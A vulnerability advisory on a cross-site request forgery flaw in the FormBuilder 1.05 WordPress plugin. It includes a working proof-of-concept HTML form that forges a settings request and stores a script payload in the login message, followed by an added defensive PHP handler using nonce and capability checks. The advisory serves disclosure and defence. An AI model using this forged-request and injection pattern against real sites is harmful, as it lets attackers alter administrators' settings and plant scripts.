WordPress FormBuilder 1.05 Cross Site Request Forgery

2017.01.30
Credit: Burak Kelebek
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

------------------------------------------------------------------------
Cross-Site Request Forgery vulnerability in FormBuilder WordPress Plugin
allows plugin permissions modification
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability has been encountered in the
FormBuilder WordPress Plugin. This issue allows an attacker to change
permission settings for the plugin by luring a logged on WordPress
Administrator into following a malicious link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0005

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on FormBuilder version 1.05.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in FormBuilder version 1.08.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_formbuilder_wordpress_plugin_allows_plugin_permissions_modification.html

The FormBuilder plugin lacks a CSRF (nonce) token on the request of
saving permissions. Because of this an attacker is able to change
permission settings for the plugin. To achieve this a logged on
WordPress Administrator must be lured into following a malicious link.
Proof of Concept code that demonstrates this issue can be found below.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The Proof of Concept code below injects script code in the "Login
Required Message" in the settings page of the FormBuilder plugin.

<html>
  <body>
    <form action="http://build.wordpress-develop.dev/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="task" value="wdm&#95;save&#95;settings" />
      <input type="hidden" name="action" value="wdm&#95;settings" />
      <input type="hidden" name="section" value="basic" />
      <input type="hidden" name="wpdm&#95;permission&#95;msg" value="Access&#32;Denied" />
      <input type="hidden" name="wpdm&#95;login&#95;msg" value="&lt;script&gt;alert&#40;&apos;csrf&#32;xss&apos;&#41;&lt;&#47;script&gt;&apos;" />
      <input type="hidden" name="&#95;wpdm&#95;file&#95;browser&#95;root" value="&#47;srv&#47;www&#47;wordpress&#45;develop&#47;build&#47;" />
      <input type="hidden" name="&#95;wpdm&#95;file&#95;browser&#95;access&#91;&#93;" value="administrator" />
      <input type="hidden" name="&#95;&#95;wpdm&#95;sanitize&#95;filename" value="0" />
      <input type="hidden" name="&#95;&#95;wpdm&#95;download&#95;speed" value="4096" />
      <input type="hidden" name="&#95;&#95;wpdm&#95;download&#95;resume" value="1" />
      <input type="hidden" name="&#95;&#95;wpdm&#95;support&#95;output&#95;buffer" value="1" />
      <input type="hidden" name="&#95;&#95;wpdm&#95;open&#95;in&#95;browser" value="0" />
      <input type="hidden" name="&#95;wpdm&#95;recaptcha&#95;site&#95;key" value="" />
      <input type="hidden" name="&#95;wpdm&#95;recaptcha&#95;secret&#95;key" value="" />
      <input type="hidden" name="&#95;&#95;wpdm&#95;disable&#95;scripts&#91;&#93;" value="" />
      <input type="hidden" name="&#95;&#95;wpdm&#95;login&#95;url" value="" />
      <input type="hidden" name="&#95;&#95;wpdm&#95;register&#95;url" value="" />
      <input type="hidden" name="&#95;&#95;wpdm&#95;user&#95;dashboard" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
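
The kind of server-side check the Details section says is missing, as an added example that is not part of the advisory and not FormBuilder's own code: a WordPress AJAX settings handler that verifies a nonce and the caller's capability before saving, and strips markup from the message fields. The function, nonce and option names are hypothetical; the request field names are the ones used in the PoC form.

```php
<?php
// Added example, not FormBuilder's code. Function, nonce and option names are
// hypothetical; the request fields (action, wpdm_login_msg,
// wpdm_permission_msg) are the ones that appear in the PoC form.
defined( 'ABSPATH' ) || exit;

const EXAMPLE_NONCE_ACTION = 'example_save_settings'; // hypothetical nonce action
const EXAMPLE_NONCE_FIELD  = '_example_nonce';        // hypothetical field name

// Called inside the settings <form>: emits a hidden nonce field bound to the
// current user, session and action. A page on another origin cannot read it.
function example_render_settings_nonce() {
    wp_nonce_field( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD );
}

// Registered for authenticated users only (no wp_ajax_nopriv_ hook).
add_action( 'wp_ajax_wdm_settings', 'example_save_settings' );

function example_save_settings() {
    // 1. CSRF: without a valid nonce the request is rejected. The forged
    //    cross-site POST carries the admin's cookies but no nonce, so it
    //    stops here and nothing is saved.
    if ( ! check_ajax_referer( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD, false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    // 2. Authorization: a nonce shows intent, not privilege.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input handling: the message fields are plain text, so markup such as
    //    the <script> element in the PoC is stripped before storage.
    foreach ( array( 'wpdm_login_msg', 'wpdm_permission_msg' ) as $field ) {
        if ( isset( $_POST[ $field ] ) ) {
            $value = sanitize_text_field( wp_unslash( $_POST[ $field ] ) );
            update_option( 'example_' . $field, $value ); // hypothetical option name
        }
    }

    wp_send_json_success();
}

// When a stored message is rendered, escape it at output as well.
function example_render_login_message() {
    echo esc_html( get_option( 'example_wpdm_login_msg', '' ) );
}
```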

